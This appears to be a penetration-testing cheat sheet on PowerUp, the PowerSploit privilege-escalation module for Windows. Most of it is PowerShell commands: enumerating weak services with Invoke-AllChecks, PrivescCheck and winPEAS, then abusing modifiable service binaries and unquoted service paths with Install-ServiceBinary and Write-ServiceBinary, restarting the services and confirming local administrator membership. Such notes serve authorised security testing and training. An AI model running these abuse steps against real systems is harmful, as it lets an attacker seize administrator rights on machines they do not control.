# PowerUp

[PowerUp](https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc) is a PowerShell tool used for privilege escalation on Windows systems. It helps identify misconfigurations and exploitable settings that allow users to elevate their privileges. It typically can be found at `/share/windows-resources/powersploit/Privesc/PowerUp.ps1`.

{% tabs %}
{% tab title="Service Cmds" %}
PowerShell commands for service interaction:

```powershell
# Service status
Get-Service -Name 'BackupMonitor'

# Start/Stop the service
Start-Service -Name "<ServiceName>"
Stop-Service -Name "<ServiceName>" -Force

# Restart the service
Restart-Service -Name 'BackupMonitor' -Force
```

{% endtab %}

{% tab title="AllChecks" %}

```powershell
Invoke-AllChecks
```

Details with examples on how an abuse works:

```powershell
help invoke-serviceabuse -examples
```

[PrivescCheck](https://github.com/itm4n/PrivescCheck) and [winPEAS](https://github.com/peass-ng/PEASS-ng/tree/master/winPEAS) can also be used for full coverage:

```powershell
# PrivescCheck
Invoke-PrivEscCheck

# PEASS-ng
winPEASx64.exe -all
```

{% endtab %}

{% tab title="Binary Hijacking" %}
Enumerate potentially vulnerable services:

```powershell
# Services that user can modify their binary path or change args to the binary
Get-ModifiableServiceFile

# Service that user can modify their configurations
Get-ModifiableService

# Abuse the enumerate service
Install-ServiceBinary -Name 'mysql'

# Restart the service
Restart-Service -Name 'mysqld' -Force

# Confirm that it worked
> net localgroup administrators
```

{% endtab %}

{% tab title="Unquoted Paths" %}
{% code overflow="wrap" %}

```powershell
# Services with unquoted paths that also have a space in the name
Get-ServiceUnquoted
Get-UnquotedService

# Abuse
Write-ServiceBinary -Name 'GammaService' -Path "C:\Program Files\Enterprise Apps\Current.exe"

# Restart (ignore any erros)
Restart-Service GammaService

# Confirm
net localgroup administrators
```

{% endcode %}
{% endtab %}
{% endtabs %}